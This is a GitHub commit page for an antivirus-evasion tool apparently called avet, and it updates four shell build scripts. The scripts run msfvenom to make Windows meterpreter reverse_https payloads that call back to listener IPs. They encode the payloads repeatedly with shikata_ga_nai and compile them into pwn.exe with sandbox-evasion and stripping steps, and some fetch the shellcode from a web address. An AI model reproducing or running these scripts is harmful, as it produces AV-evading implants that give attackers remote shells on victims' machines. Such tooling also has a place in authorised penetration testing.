Skip to content

Commit

Permalink
update for 1.2
Browse files Browse the repository at this point in the history
  • Loading branch information
govolution committed Jun 12, 2017
1 parent 43add2f commit cc5387b
Show file tree
Hide file tree
Showing 4 changed files with 7 additions and 6 deletions.
2 changes: 1 addition & 1 deletion build/build_win32_meterpreter_rev_https_fopen_shikata.sh
Original file line number Diff line number Diff line change
@@ -1,6 +1,6 @@
#!/bin/bash
. build/global_win32.sh
msfvenom -p windows/meterpreter/reverse_https lhost=192.168.116.132 lport=443 -e x86/shikata_ga_nai -i 3 -f c -a x86 --platform Windows > sc.txt
msfvenom -p windows/meterpreter/reverse_https lhost=192.168.116.142 lport=443 -e x86/shikata_ga_nai -i 3 -f c -a x86 --platform Windows > sc.txt
#./format.sh sc.txt > scclean.txt && rm sc.txt
#cat sc.txt >> defs.h
#echo "" > scclean.txt
Expand Down
2 changes: 1 addition & 1 deletion build/build_win32_meterpreter_rev_https_shikata_fopen.sh
Original file line number Diff line number Diff line change
Expand Up @@ -6,7 +6,7 @@
. build/global_win32.sh
# make meterpreter reverse payload, encoded with shikata_ga_nai
# additionaly to the avet encoder, further encoding should be used
msfvenom -p windows/meterpreter/reverse_https lhost=192.168.116.132 lport=443 -e x86/shikata_ga_nai -i 3 -f c -a x86 --platform Windows > sc.txt
msfvenom -p windows/meterpreter/reverse_https lhost=192.168.116.142 lport=443 -e x86/shikata_ga_nai -i 3 -f c -a x86 --platform Windows > sc.txt
# format the shellcode for make_avet
./format.sh sc.txt > scclean.txt && rm sc.txt
# call make_avet, the -f compiles the shellcode to the exe file, the -F is for the AV sandbox evasion
Expand Down
Original file line number Diff line number Diff line change
@@ -1,14 +1,14 @@
#!/bin/bash
# simple example script for building the .exe file
. build/global_win32.sh
. build/global_win64.sh
# make meterpreter reverse payload, encoded with shikata_ga_nai
# additionaly to the avet encoder, further encoding should be used
msfvenom -p windows/meterpreter/reverse_https lhost=192.168.2.105 lport=443 -e x86/shikata_ga_nai -i 2 -f c -a x86 --platform Windows > sc.txt
msfvenom -p windows/meterpreter/reverse_https lhost=192.168.116.128 lport=443 -e x86/shikata_ga_nai -i 2 -f c -a x86 --platform Windows > sc.txt
# format the shellcode for make_avet
./format.sh sc.txt > scclean.txt && rm sc.txt
# call make_avet, compile
./make_avet -E -u 192.168.2.105/scclean.txt -p
$win32_compiler -o pwn.exe avet.c
./make_avet -X -E -u 192.168.2.105/scclean.txt -p
$win64_compiler -o pwn.exe avet.c
# cleanup
echo " " > defs.h
# now copy scclean.txt to your web root and start
Original file line number Diff line number Diff line change
Expand Up @@ -13,6 +13,7 @@ msfvenom -p windows/meterpreter/reverse_https lhost=192.168.116.128 lport=443 -e
./make_avet -l thepayload.exe -E
# compile to pwn.exe file
$win32_compiler -o pwn.exe avet.c
strip pwn.exe
# cleanup
echo "" > defs.h
# call your programm with pwn.exe thepayload.txt

0 comments on commit cc5387b

Please sign in to comment.